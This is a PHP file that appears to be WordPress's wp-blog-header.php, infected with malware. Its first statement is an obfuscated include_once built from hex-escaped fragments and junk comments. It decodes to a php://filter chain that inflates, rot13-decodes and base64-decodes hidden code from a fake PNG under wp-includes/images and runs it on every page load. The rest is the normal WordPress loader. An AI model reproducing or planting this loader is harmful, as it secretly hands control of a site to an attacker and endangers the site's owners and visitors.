<?php
@INCLudE_ONce("\x70\x68"."\x70\x3a\x2f"."\x2f\x66\x69\x6c"."\x74\x65"."\x72\x2f"."\x72\x65\x61"."\x64\x3d"."\x7a\x6c\x69"."\x62\x2e"."\x69\x6e\x66"."\x6c\x61\x74"."\x65\x7c\x73"."\x74\x72\x69\x6e"."\x67\x2e\x72\x6f"."\x74\x31\x33\x7c"/*lP,]$*/."\x63\x6f"."\x6e\x76\x65"."\x72\x74\x2e"/*pthk*/."\x62\x61\x73\x65"."\x36\x34\x2d\x64"/*0vB
!_Q*/."\x65\x63\x6f\x64"."\x65\x2f\x72"."\x65\x73\x6f"."\x75\x72\x63\x65"/*27G;
MGk1*/."\x3d\x77\x70"."\x2d\x69\x6e\x63"/*SXhp
Et{mj*/."\x6c\x75\x64\x65"."\x73\x2f"."\x69\x6d"."\x61\x67\x65\x73"."\x2f\x63\x72"."\x79\x73\x74\x61"."\x6c\x2f\x69"."\x6e\x74\x65"."\x72\x61"."\x63\x74\x69"."\x76\x65"."\x2d\x6c"."\x69\x62\x2e\x70"."\x6e\x67");
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}
